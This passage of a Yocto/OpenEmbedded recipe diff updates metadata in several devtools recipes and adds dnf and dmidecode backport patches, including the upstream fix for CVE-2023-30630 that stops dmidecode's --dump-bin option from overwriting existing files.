--- a/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
+++ b/meta/recipes-devtools/createrepo-c/createrepo-c_0.15.7.bb
@@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/rpm-software-management/createrepo_c/wiki"
4LICENSE = "GPLv2" 4LICENSE = "GPLv2"
5LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" 5LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
6 6
7SRC_URI = "git://github.com/rpm-software-management/createrepo_c \ 7SRC_URI = "git://github.com/rpm-software-management/createrepo_c;branch=master;protocol=https \
8 file://0001-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \ 8 file://0001-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
9 " 9 "
10 10
diff --git a/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb b/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
index 10220ebc91..ce242c3593 100644
--- a/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
+++ b/meta/recipes-devtools/dejagnu/dejagnu_1.6.2.bb
@@ -1,11 +1,13 @@
1SUMMARY = "GNU unit testing framework, written in Expect and Tcl" 1SUMMARY = "GNU unit testing framework, written in Expect and Tcl"
2DESCRIPTION = "DejaGnu is a framework for testing other programs. Its purpose \ 2DESCRIPTION = "DejaGnu is a framework for testing other programs. Its purpose \
3is to provide a single front end for all tests." 3is to provide a single front end for all tests."
4HOMEPAGE = "https://www.gnu.org/software/dejagnu/"
4LICENSE = "GPLv2" 5LICENSE = "GPLv2"
5LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" 6LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
6SECTION = "devel" 7SECTION = "devel"
7 8
8DEPENDS += "expect-native" 9DEPENDS += "expect-native"
10RDEPENDS_${PN} = "expect"
9 11
10inherit autotools 12inherit autotools
11 13
diff --git a/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb b/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
index aecba07235..0418ae0c5f 100644
--- a/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
+++ b/meta/recipes-devtools/desktop-file-utils/desktop-file-utils_0.24.bb
@@ -1,6 +1,7 @@
1SECTION = "console/utils"
2SUMMARY = "Command line utilities for working with *.desktop files" 1SUMMARY = "Command line utilities for working with *.desktop files"
2DESCRIPTION = "desktop-file-utils contains a few command line utilities for working with desktop entries"
3HOMEPAGE = "http://www.freedesktop.org/wiki/Software/desktop-file-utils" 3HOMEPAGE = "http://www.freedesktop.org/wiki/Software/desktop-file-utils"
4SECTION = "console/utils"
4LICENSE = "GPLv2+" 5LICENSE = "GPLv2+"
5 6
6LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ 7LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
diff --git a/meta/recipes-devtools/devel-config/distcc-config.bb b/meta/recipes-devtools/devel-config/distcc-config.bb
index 3cd661d543..db9e8bbcc9 100644
--- a/meta/recipes-devtools/devel-config/distcc-config.bb
+++ b/meta/recipes-devtools/devel-config/distcc-config.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Sets up distcc for compilation on the target device" 1SUMMARY = "Sets up distcc for compilation on the target device"
2DESCRIPTION = "${SUMMARY}"
2 3
3LICENSE = "MIT" 4LICENSE = "MIT"
4LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420" 5LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
diff --git a/meta/recipes-devtools/distcc/distcc_3.3.3.bb b/meta/recipes-devtools/distcc/distcc_3.3.3.bb
index c52f136be8..2a74a068f1 100644
--- a/meta/recipes-devtools/distcc/distcc_3.3.3.bb
+++ b/meta/recipes-devtools/distcc/distcc_3.3.3.bb
@@ -1,6 +1,7 @@
1SUMMARY = "A parallel build system" 1SUMMARY = "A parallel build system"
2DESCRIPTION = "distcc is a parallel build system that distributes \ 2DESCRIPTION = "distcc is a parallel build system that distributes \
3compilation of C/C++/ObjC code across machines on a network." 3compilation of C/C++/ObjC code across machines on a network."
4HOMEPAGE = "https://github.com/distcc/distcc"
4SECTION = "devel" 5SECTION = "devel"
5LICENSE = "GPLv2" 6LICENSE = "GPLv2"
6LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" 7LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
@@ -14,7 +15,7 @@ PACKAGECONFIG[popt] = "--without-included-popt,--with-included-popt,popt"
14 15
15RRECOMMENDS_${PN}-server = "avahi-daemon" 16RRECOMMENDS_${PN}-server = "avahi-daemon"
16 17
17SRC_URI = "git://github.com/distcc/distcc.git \ 18SRC_URI = "git://github.com/distcc/distcc.git;branch=master;protocol=https \
18 file://fix-gnome.patch \ 19 file://fix-gnome.patch \
19 file://separatebuilddir.patch \ 20 file://separatebuilddir.patch \
20 file://default \ 21 file://default \
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch
new file mode 100644
index 0000000000..f1d449acbe
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p1.patch
@@ -0,0 +1,236 @@
1From 24def311c6168d0dfb7c5f0f183b72b709c49265 Mon Sep 17 00:00:00 2001
2From: Jean Delvare <jdelvare@suse.de>
3Date: Mon, 20 Feb 2023 14:53:21 +0100
4Subject: [PATCH] dmidecode: Split table fetching from decoding
5
6Clean up function dmi_table so that it does only one thing:
7* dmi_table() is renamed to dmi_table_get(). It now retrieves the
8 DMI table, but does not process it any longer.
9* Decoding or dumping the table is now done in smbios3_decode(),
10 smbios_decode() and legacy_decode().
11No functional change.
12
13A side effect of this change is that writing the header and body of
14dump files is now done in a single location. This is required to
15further consolidate the writing of dump files.
16
17CVE-ID: CVE-2023-30630
18Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=39b2dd7b6ab7]
19
20Backport Changes:
21- In the file dmidecode.c, the commit [dd593d2] in v3.3 introduces
22 pr_info(). This is backported to printf() as per v3.2.
23
24Signed-off-by: Jean Delvare <jdelvare@suse.de>
25Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
26(cherry picked from commit 39b2dd7b6ab719b920e96ed832cfb4bdd664e808)
27Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
28---
29 dmidecode.c | 86 ++++++++++++++++++++++++++++++++++++++---------------
30 1 file changed, 62 insertions(+), 24 deletions(-)
31
32diff --git a/dmidecode.c b/dmidecode.c
33index a3e9d6c..d6eedd1 100644
34--- a/dmidecode.c
35+++ b/dmidecode.c
36@@ -5211,8 +5211,9 @@ static void dmi_table_decode(u8 *buf, u32 len, u16 num, u16 ver, u32 flags)
37 }
38 }
39
40-static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
41- u32 flags)
42+/* Allocates a buffer for the table, must be freed by the caller */
43+static u8 *dmi_table_get(off_t base, u32 *len, u16 num, u32 ver,
44+ const char *devmem, u32 flags)
45 {
46 u8 *buf;
47
48@@ -5231,7 +5232,7 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
49 {
50 if (num)
51 printf("%u structures occupying %u bytes.\n",
52- num, len);
53+ num, *len);
54 if (!(opt.flags & FLAG_FROM_DUMP))
55 printf("Table at 0x%08llX.\n",
56 (unsigned long long)base);
57@@ -5249,19 +5250,19 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
58 * would be the result of the kernel truncating the table on
59 * parse error.
60 */
61- size_t size = len;
62+ size_t size = *len;
63 buf = read_file(flags & FLAG_NO_FILE_OFFSET ? 0 : base,
64 &size, devmem);
65- if (!(opt.flags & FLAG_QUIET) && num && size != (size_t)len)
66+ if (!(opt.flags & FLAG_QUIET) && num && size != (size_t)*len)
67 {
68 fprintf(stderr, "Wrong DMI structures length: %u bytes "
69 "announced, only %lu bytes available.\n",
70- len, (unsigned long)size);
71+ *len, (unsigned long)size);
72 }
73- len = size;
74+ *len = size;
75 }
76 else
77- buf = mem_chunk(base, len, devmem);
78+ buf = mem_chunk(base, *len, devmem);
79
80 if (buf == NULL)
81 {
82@@ -5271,15 +5272,9 @@ static void dmi_table(off_t base, u32 len, u16 num, u32 ver, const char *devmem,
83 fprintf(stderr,
84 "Try compiling dmidecode with -DUSE_MMAP.\n");
85 #endif
86- return;
87 }
88
89- if (opt.flags & FLAG_DUMP_BIN)
90- dmi_table_dump(buf, len);
91- else
92- dmi_table_decode(buf, len, num, ver >> 8, flags);
93-
94- free(buf);
95+ return buf;
96 }
97
98
99@@ -5314,8 +5309,9 @@ static void overwrite_smbios3_address(u8 *buf)
100
101 static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
102 {
103- u32 ver;
104+ u32 ver, len;
105 u64 offset;
106+ u8 *table;
107
108 /* Don't let checksum run beyond the buffer */
109 if (buf[0x06] > 0x20)
110@@ -5341,8 +5337,12 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
111 return 0;
112 }
113
114- dmi_table(((off_t)offset.h << 32) | offset.l,
115- DWORD(buf + 0x0C), 0, ver, devmem, flags | FLAG_STOP_AT_EOT);
116+ /* Maximum length, may get trimmed */
117+ len = DWORD(buf + 0x0C);
118+ table = dmi_table_get(((off_t)offset.h << 32) | offset.l, &len, 0, ver,
119+ devmem, flags | FLAG_STOP_AT_EOT);
120+ if (table == NULL)
121+ return 1;
122
123 if (opt.flags & FLAG_DUMP_BIN)
124 {
125@@ -5351,18 +5351,28 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
126 memcpy(crafted, buf, 32);
127 overwrite_smbios3_address(crafted);
128
129+ dmi_table_dump(table, len);
130 if (!(opt.flags & FLAG_QUIET))
131 printf("# Writing %d bytes to %s.\n", crafted[0x06],
132 opt.dumpfile);
133 write_dump(0, crafted[0x06], crafted, opt.dumpfile, 1);
134 }
135+ else
136+ {
137+ dmi_table_decode(table, len, 0, ver >> 8,
138+ flags | FLAG_STOP_AT_EOT);
139+ }
140+
141+ free(table);
142
143 return 1;
144 }
145
146 static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
147 {
148- u16 ver;
149+ u16 ver, num;
150+ u32 len;
151+ u8 *table;
152
153 /* Don't let checksum run beyond the buffer */
154 if (buf[0x05] > 0x20)
155@@ -5402,8 +5412,13 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
156 printf("SMBIOS %u.%u present.\n",
157 ver >> 8, ver & 0xFF);
158
159- dmi_table(DWORD(buf + 0x18), WORD(buf + 0x16), WORD(buf + 0x1C),
160- ver << 8, devmem, flags);
161+ /* Maximum length, may get trimmed */
162+ len = WORD(buf + 0x16);
163+ num = WORD(buf + 0x1C);
164+ table = dmi_table_get(DWORD(buf + 0x18), &len, num, ver << 8,
165+ devmem, flags);
166+ if (table == NULL)
167+ return 1;
168
169 if (opt.flags & FLAG_DUMP_BIN)
170 {
171@@ -5412,27 +5427,43 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
172 memcpy(crafted, buf, 32);
173 overwrite_dmi_address(crafted + 0x10);
174
175+ dmi_table_dump(table, len);
176 if (!(opt.flags & FLAG_QUIET))
177 printf("# Writing %d bytes to %s.\n", crafted[0x05],
178 opt.dumpfile);
179 write_dump(0, crafted[0x05], crafted, opt.dumpfile, 1);
180 }
181+ else
182+ {
183+ dmi_table_decode(table, len, num, ver, flags);
184+ }
185+
186+ free(table);
187
188 return 1;
189 }
190
191 static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
192 {
193+ u16 ver, num;
194+ u32 len;
195+ u8 *table;
196+
197 if (!checksum(buf, 0x0F))
198 return 0;
199
200+ ver = ((buf[0x0E] & 0xF0) << 4) + (buf[0x0E] & 0x0F);
201 if (!(opt.flags & FLAG_QUIET))
202 printf("Legacy DMI %u.%u present.\n",
203 buf[0x0E] >> 4, buf[0x0E] & 0x0F);
204
205- dmi_table(DWORD(buf + 0x08), WORD(buf + 0x06), WORD(buf + 0x0C),
206- ((buf[0x0E] & 0xF0) << 12) + ((buf[0x0E] & 0x0F) << 8),
207- devmem, flags);
208+ /* Maximum length, may get trimmed */
209+ len = WORD(buf + 0x06);
210+ num = WORD(buf + 0x0C);
211+ table = dmi_table_get(DWORD(buf + 0x08), &len, num, ver << 8,
212+ devmem, flags);
213+ if (table == NULL)
214+ return 1;
215
216 if (opt.flags & FLAG_DUMP_BIN)
217 {
218@@ -5441,11 +5472,18 @@ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
219 memcpy(crafted, buf, 16);
220 overwrite_dmi_address(crafted);
221
222+ dmi_table_dump(table, len);
223 if (!(opt.flags & FLAG_QUIET))
224 printf("# Writing %d bytes to %s.\n", 0x0F,
225 opt.dumpfile);
226 write_dump(0, 0x0F, crafted, opt.dumpfile, 1);
227 }
228+ else
229+ {
230+ dmi_table_decode(table, len, num, ver, flags);
231+ }
232+
233+ free(table);
234
235 return 1;
236 }
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch
new file mode 100644
index 0000000000..353c2553f5
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630-dependent_p2.patch
@@ -0,0 +1,198 @@
1From 58e8a07b1aef0e53af1642b30248255e53e42790 Mon Sep 17 00:00:00 2001
2From: Jean Delvare <jdelvare@suse.de>
3Date: Mon, 20 Feb 2023 14:53:25 +0100
4Subject: [PATCH] dmidecode: Write the whole dump file at once
5
6When option --dump-bin is used, write the whole dump file at once,
7instead of opening and closing the file separately for the table
8and then for the entry point.
9
10As the file writing function is no longer generic, it gets moved
11from util.c to dmidecode.c.
12
13One minor functional change resulting from the new implementation is
14that the entry point is written first now, so the messages printed
15are swapped.
16
17CVE: CVE-2023-30630
18Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=d8cfbc808f38]
19
20Backport Changes:
21- In the file dmidecode.c, the commit [2241f1d] in v3.3 introduces
22 pr_info(). This is backported to printf() as per v3.2.
23
24Signed-off-by: Jean Delvare <jdelvare@suse.de>
25Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
26(cherry picked from commit d8cfbc808f387e87091c25e7d5b8c2bb348bb206)
27Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
28
29---
30 dmidecode.c | 69 +++++++++++++++++++++++++++++++++++++++--------------
31 util.c | 40 -------------------------------
32 util.h | 1 -
33 3 files changed, 51 insertions(+), 59 deletions(-)
34
35diff --git a/dmidecode.c b/dmidecode.c
36index d6eedd1..b91e53b 100644
37--- a/dmidecode.c
38+++ b/dmidecode.c
39@@ -5094,11 +5094,56 @@ static void dmi_table_string(const struct dmi_header *h, const u8 *data, u16 ver
40 }
41 }
42
43-static void dmi_table_dump(const u8 *buf, u32 len)
44+static int dmi_table_dump(const u8 *ep, u32 ep_len, const u8 *table,
45+ u32 table_len)
46 {
47+ FILE *f;
48+
49+ f = fopen(opt.dumpfile, "wb");
50+ if (!f)
51+ {
52+ fprintf(stderr, "%s: ", opt.dumpfile);
53+ perror("fopen");
54+ return -1;
55+ }
56+
57+ if (!(opt.flags & FLAG_QUIET))
58+ printf("# Writing %d bytes to %s.\n", ep_len, opt.dumpfile);
59+ if (fwrite(ep, ep_len, 1, f) != 1)
60+ {
61+ fprintf(stderr, "%s: ", opt.dumpfile);
62+ perror("fwrite");
63+ goto err_close;
64+ }
65+
66+ if (fseek(f, 32, SEEK_SET) != 0)
67+ {
68+ fprintf(stderr, "%s: ", opt.dumpfile);
69+ perror("fseek");
70+ goto err_close;
71+ }
72+
73 if (!(opt.flags & FLAG_QUIET))
74- printf("# Writing %d bytes to %s.\n", len, opt.dumpfile);
75- write_dump(32, len, buf, opt.dumpfile, 0);
76+ printf("# Writing %d bytes to %s.\n", table_len, opt.dumpfile);
77+ if (fwrite(table, table_len, 1, f) != 1)
78+ {
79+ fprintf(stderr, "%s: ", opt.dumpfile);
80+ perror("fwrite");
81+ goto err_close;
82+ }
83+
84+ if (fclose(f))
85+ {
86+ fprintf(stderr, "%s: ", opt.dumpfile);
87+ perror("fclose");
88+ return -1;
89+ }
90+
91+ return 0;
92+
93+err_close:
94+ fclose(f);
95+ return -1;
96 }
97
98 static void dmi_table_decode(u8 *buf, u32 len, u16 num, u16 ver, u32 flags)
99@@ -5351,11 +5396,7 @@ static int smbios3_decode(u8 *buf, const char *devmem, u32 flags)
100 memcpy(crafted, buf, 32);
101 overwrite_smbios3_address(crafted);
102
103- dmi_table_dump(table, len);
104- if (!(opt.flags & FLAG_QUIET))
105- printf("# Writing %d bytes to %s.\n", crafted[0x06],
106- opt.dumpfile);
107- write_dump(0, crafted[0x06], crafted, opt.dumpfile, 1);
108+ dmi_table_dump(crafted, crafted[0x06], table, len);
109 }
110 else
111 {
112@@ -5427,11 +5468,7 @@ static int smbios_decode(u8 *buf, const char *devmem, u32 flags)
113 memcpy(crafted, buf, 32);
114 overwrite_dmi_address(crafted + 0x10);
115
116- dmi_table_dump(table, len);
117- if (!(opt.flags & FLAG_QUIET))
118- printf("# Writing %d bytes to %s.\n", crafted[0x05],
119- opt.dumpfile);
120- write_dump(0, crafted[0x05], crafted, opt.dumpfile, 1);
121+ dmi_table_dump(crafted, crafted[0x05], table, len);
122 }
123 else
124 {
125@@ -5472,11 +5509,7 @@ static int legacy_decode(u8 *buf, const char *devmem, u32 flags)
126 memcpy(crafted, buf, 16);
127 overwrite_dmi_address(crafted);
128
129- dmi_table_dump(table, len);
130- if (!(opt.flags & FLAG_QUIET))
131- printf("# Writing %d bytes to %s.\n", 0x0F,
132- opt.dumpfile);
133- write_dump(0, 0x0F, crafted, opt.dumpfile, 1);
134+ dmi_table_dump(crafted, 0x0F, table, len);
135 }
136 else
137 {
138diff --git a/util.c b/util.c
139index eeffdae..2e1931c 100644
140--- a/util.c
141+++ b/util.c
142@@ -247,46 +247,6 @@ out:
143 return p;
144 }
145
146-int write_dump(size_t base, size_t len, const void *data, const char *dumpfile, int add)
147-{
148- FILE *f;
149-
150- f = fopen(dumpfile, add ? "r+b" : "wb");
151- if (!f)
152- {
153- fprintf(stderr, "%s: ", dumpfile);
154- perror("fopen");
155- return -1;
156- }
157-
158- if (fseek(f, base, SEEK_SET) != 0)
159- {
160- fprintf(stderr, "%s: ", dumpfile);
161- perror("fseek");
162- goto err_close;
163- }
164-
165- if (fwrite(data, len, 1, f) != 1)
166- {
167- fprintf(stderr, "%s: ", dumpfile);
168- perror("fwrite");
169- goto err_close;
170- }
171-
172- if (fclose(f))
173- {
174- fprintf(stderr, "%s: ", dumpfile);
175- perror("fclose");
176- return -1;
177- }
178-
179- return 0;
180-
181-err_close:
182- fclose(f);
183- return -1;
184-}
185-
186 /* Returns end - start + 1, assuming start < end */
187 u64 u64_range(u64 start, u64 end)
188 {
189diff --git a/util.h b/util.h
190index 3094cf8..ef24eb9 100644
191--- a/util.h
192+++ b/util.h
193@@ -27,5 +27,4 @@
194 int checksum(const u8 *buf, size_t len);
195 void *read_file(off_t base, size_t *len, const char *filename);
196 void *mem_chunk(off_t base, size_t len, const char *devmem);
197-int write_dump(size_t base, size_t len, const void *data, const char *dumpfile, int add);
198 u64 u64_range(u64 start, u64 end);
diff --git a/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch
new file mode 100644
index 0000000000..bf4d060c8c
--- /dev/null
+++ b/meta/recipes-devtools/dmidecode/dmidecode/CVE-2023-30630.patch
@@ -0,0 +1,62 @@
1From b7dacccff32294ea522df32a9391d0218e7600ea Mon Sep 17 00:00:00 2001
2From: Jean Delvare <jdelvare@suse.de>
3Date: Mon, 20 Feb 2023 14:53:31 +0100
4Subject: [PATCH] dmidecode: Do not let --dump-bin overwrite an existing file
5
6Make sure that the file passed to option --dump-bin does not already
7exist. In practice, it is rather unlikely that an honest user would
8want to overwrite an existing dump file, while this possibility
9could be used by a rogue user to corrupt a system file.
10
11CVE: CVE-2023-30630
12Upstream-Status: Backport [https://git.savannah.nongnu.org/cgit/dmidecode.git/commit/?id=6ca381c1247c]
13
14Backport Changes:
15- Ignored changes in man/dmidecode.8 file.
16
17Signed-off-by: Jean Delvare <jdelvare@suse.de>
18Reviewed-by: Jerry Hoemann <jerry.hoemann@hpe.com>
19(cherry picked from commit 6ca381c1247c81f74e1ca4e7706f70bdda72e6f2)
20Signed-off-by: Dhairya Nagodra <dnagodra@cisco.com>
21
22---
23 dmidecode.c | 14 ++++++++++++--
24 1 file changed, 12 insertions(+), 2 deletions(-)
25
26diff --git a/dmidecode.c b/dmidecode.c
27index b91e53b..846d9a1 100644
28--- a/dmidecode.c
29+++ b/dmidecode.c
30@@ -60,6 +60,7 @@
31 * https://www.dmtf.org/sites/default/files/DSP0270_1.0.1.pdf
32 */
33
34+#include <fcntl.h>
35 #include <stdio.h>
36 #include <string.h>
37 #include <strings.h>
38@@ -5097,13 +5098,22 @@ static void dmi_table_string(const struct dmi_header *h, const u8 *data, u16 ver
39 static int dmi_table_dump(const u8 *ep, u32 ep_len, const u8 *table,
40 u32 table_len)
41 {
42+ int fd;
43 FILE *f;
44
45- f = fopen(opt.dumpfile, "wb");
46+ fd = open(opt.dumpfile, O_WRONLY|O_CREAT|O_EXCL, 0666);
47+ if (fd == -1)
48+ {
49+ fprintf(stderr, "%s: ", opt.dumpfile);
50+ perror("open");
51+ return -1;
52+ }
53+
54+ f = fdopen(fd, "wb");
55 if (!f)
56 {
57 fprintf(stderr, "%s: ", opt.dumpfile);
58- perror("fopen");
59+ perror("fdopen");
60 return -1;
61 }
62
diff --git a/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb b/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
index 63f4061cb7..1e7c38dc8a 100644
--- a/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
+++ b/meta/recipes-devtools/dmidecode/dmidecode_3.2.bb
@@ -1,10 +1,14 @@
1SUMMARY = "DMI (Desktop Management Interface) table related utilities" 1SUMMARY = "DMI (Desktop Management Interface) table related utilities"
2HOMEPAGE = "http://www.nongnu.org/dmidecode/" 2HOMEPAGE = "http://www.nongnu.org/dmidecode/"
3DESCRIPTION = "Dmidecode reports information about your system's hardware as described in your system BIOS according to the SMBIOS/DMI standard (see a sample output)."
3LICENSE = "GPLv2" 4LICENSE = "GPLv2"
4LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263" 5LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263"
5 6
6SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/dmidecode/${BP}.tar.xz \ 7SRC_URI = "${SAVANNAH_NONGNU_MIRROR}/dmidecode/${BP}.tar.xz \
7 file://0001-Committing-changes-from-do_unpack_extra.patch \ 8 file://0001-Committing-changes-from-do_unpack_extra.patch \
9 file://CVE-2023-30630-dependent_p1.patch \
10 file://CVE-2023-30630-dependent_p2.patch \
11 file://CVE-2023-30630.patch \
8 " 12 "
9 13
10COMPATIBLE_HOST = "(i.86|x86_64|aarch64|arm|powerpc|powerpc64).*-linux" 14COMPATIBLE_HOST = "(i.86|x86_64|aarch64|arm|powerpc|powerpc64).*-linux"
diff --git a/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch b/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch
new file mode 100644
index 0000000000..57c2375a54
--- /dev/null
+++ b/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch
@@ -0,0 +1,60 @@
1From c88a77198c0156e425c2725f30e481207de5162f Mon Sep 17 00:00:00 2001
2From: Jaroslav Mracek <jmracek@redhat.com>
3Date: Tue, 3 Sep 2019 11:01:51 +0200
4Subject: [PATCH] Keep installed packages in upgrade job
5 (RhBug:1728252,1644241,1741381)
6
7In combination with marking of job as TARGETED it prevents from
8reinstalling of modified packages with same NEVRA.
9
10https://bugzilla.redhat.com/show_bug.cgi?id=1728252
11https://bugzilla.redhat.com/show_bug.cgi?id=1644241
12https://bugzilla.redhat.com/show_bug.cgi?id=1741381
13
14Closes: #1474
15Approved by: m-blaha
16
17
18Backport to fix bug in dnf in oe-core
19from https://github.com/rpm-software-management/dnf
20
21Removed spec file portion of patch
22
23Upstream-Status: Backport
24Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
25---
26 dnf.spec | 4 ++--
27 dnf/base.py | 3 ---
28 dnf/module/module_base.py | 2 +-
29 3 files changed, 3 insertions(+), 6 deletions(-)
30
31diff --git a/dnf/base.py b/dnf/base.py
32index b2ced61..628c154 100644
33--- a/dnf/base.py
34+++ b/dnf/base.py
35@@ -1968,9 +1968,6 @@ class Base(object):
36 obsoletes=q.installed().union(q.upgrades()))
37 # add obsoletes into transaction
38 q = q.union(obsoletes)
39- # provide only available packages to solver otherwise selection of available
40- # possibilities will be ignored
41- q = q.available()
42 if reponame is not None:
43 q.filterm(reponame=reponame)
44 q = self._merge_update_filters(q, pkg_spec=pkg_spec)
45diff --git a/dnf/module/module_base.py b/dnf/module/module_base.py
46index 976d730..ce70f63 100644
47--- a/dnf/module/module_base.py
48+++ b/dnf/module/module_base.py
49@@ -214,7 +214,7 @@ class ModuleBase(object):
50
51 if not upgrade_package_set:
52 logger.error(_("Unable to match profile in argument {}").format(spec))
53- query = self.base.sack.query().available().filterm(name=upgrade_package_set)
54+ query = self.base.sack.query().filterm(name=upgrade_package_set)
55 if query:
56 sltr = dnf.selector.Selector(self.base.sack)
57 sltr.set(pkg=query)
58--
592.7.4
60
diff --git a/meta/recipes-devtools/dnf/dnf_4.2.2.bb b/meta/recipes-devtools/dnf/dnf_4.2.2.bb
index a046ffc05d..6b6b233d6d 100644
--- a/meta/recipes-devtools/dnf/dnf_4.2.2.bb
+++ b/meta/recipes-devtools/dnf/dnf_4.2.2.bb
@@ -2,12 +2,13 @@ SUMMARY = "Package manager forked from Yum, using libsolv as a dependency resolv
2DESCRIPTION = "Software package manager that installs, updates, and removes \ 2DESCRIPTION = "Software package manager that installs, updates, and removes \
3packages on RPM-based Linux distributions. It automatically computes \ 3packages on RPM-based Linux distributions. It automatically computes \
4dependencies and determines the actions required to install packages." 4dependencies and determines the actions required to install packages."
5HOMEPAGE = "https://github.com/rpm-software-management/dnf"
5LICENSE = "GPLv2" 6LICENSE = "GPLv2"
6LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ 7LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
7 file://PACKAGE-LICENSING;md5=4a0548e303dbc77f067335b4d688e745 \ 8 file://PACKAGE-LICENSING;md5=4a0548e303dbc77f067335b4d688e745 \
8 " 9 "
9 10
10SRC_URI = "git://github.com/rpm-software-management/dnf.git \ 11SRC_URI = "git://github.com/rpm-software-management/dnf.git;branch=master;protocol=https \
11 file://0001-Corretly-install-tmpfiles.d-configuration.patch \ 12 file://0001-Corretly-install-tmpfiles.d-configuration.patch \
12 file://0001-Do-not-hardcode-etc-and-systemd-unit-directories.patch \ 13 file://0001-Do-not-hardcode-etc-and-systemd-unit-directories.patch \
13 file://0005-Do-not-prepend-installroot-to-logdir.patch \ 14 file://0005-Do-not-prepend-installroot-to-logdir.patch \
@@ -15,6 +16,7 @@ SRC_URI = "git://github.com/rpm-software-management/dnf.git \
15 file://0030-Run-python-scripts-using-env.patch \ 16 file://0030-Run-python-scripts-using-env.patch \
16 file://Fix-SyntaxWarning.patch \ 17 file://Fix-SyntaxWarning.patch \
17 file://0001-set-python-path-for-completion_helper.patch \ 18 file://0001-set-python-path-for-completion_helper.patch \
19 file://0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch \
18 " 20 "
19 21
20SRCREV = "9947306a55271b8b7c9e2b6e3b7d582885b6045d" 22SRCREV = "9947306a55271b8b7c9e2b6e3b7d582885b6045d"
diff --git a/meta/recipes-devtools/dpkg/dpkg.inc b/meta/recipes-devtools/dpkg/dpkg.inc
index 1c3c585d79..f008959d77 100644
--- a/meta/recipes-devtools/dpkg/dpkg.inc
+++ b/meta/recipes-devtools/dpkg/dpkg.inc
@@ -1,5 +1,7 @@
1SUMMARY = "Package maintenance system from Debian" 1SUMMARY = "Package maintenance system from Debian"
2LICENSE = "GPLv2.0+" 2LICENSE = "GPLv2.0+"
3HOMEPAGE = "https://salsa.debian.org/dpkg-team/dpkg"
4DESCRIPTION = "The primary interface for the dpkg suite is the dselect program. A more low-level and less user-friendly interface is available in the form of the dpkg command."
3SECTION = "base" 5SECTION = "base"
4 6
5DEPENDS = "zlib bzip2 perl ncurses" 7DEPENDS = "zlib bzip2 perl ncurses"
diff --git a/meta/recipes-devtools/dpkg/dpkg_1.19.7.bb b/meta/recipes-devtools/dpkg/dpkg_1.19.8.bb
index e9dec337b3..9e6e9f2464 100644
--- a/meta/recipes-devtools/dpkg/dpkg_1.19.7.bb
